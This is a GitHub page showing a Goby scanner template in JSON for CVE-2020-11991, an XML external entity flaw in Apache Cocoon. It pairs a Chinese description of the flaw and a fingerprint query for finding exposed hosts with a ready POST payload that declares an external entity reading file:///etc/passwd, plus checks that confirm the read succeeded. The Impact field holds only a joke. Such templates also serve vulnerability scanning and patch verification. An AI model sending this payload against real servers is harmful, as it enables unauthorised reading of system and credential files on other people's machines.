-
Notifications
You must be signed in to change notification settings - Fork 0
/
Apache Cocoon Xml 注入 CVE-2020-11991.json
55 lines (55 loc) · 2.86 KB
/
Apache Cocoon Xml 注入 CVE-2020-11991.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
{
"Name": "Apache Cocoon Xml 注入 CVE-2020-11991",
"Level": "1",
"Tags": [
"XML注入"
],
"GobyQuery": "app=\"Apache-Cocoon\"",
"Description": "9月11日 Apache 软件基金会发布安全公告,修复了 Apache Cocoon xml外部实体注入漏洞(CVE-2020-11991)。\n\nApache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架,在这种框架下的所有处理都被预先定义好的处理组件线性连接起来,能够将输入和产生的输出按照流水线顺序处理。用户群:Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等,Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n\nApache Cocoon <= 2.1.12",
"Product": "Apache Cocoon",
"Homepage": "http://cocoon.apache.org/2.1/",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩</span>🐑</p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/v2/api/product/manger/getInfo",
"follow_redirect": true,
"header": {
"Content-type": "text/xml"
},
"data_type": "text",
"data": "<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName> \n<lastName>&ent;</lastName>\n</userInfo>"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-01-22 22:24:01",
"GobyVersion": "1.8.237"
}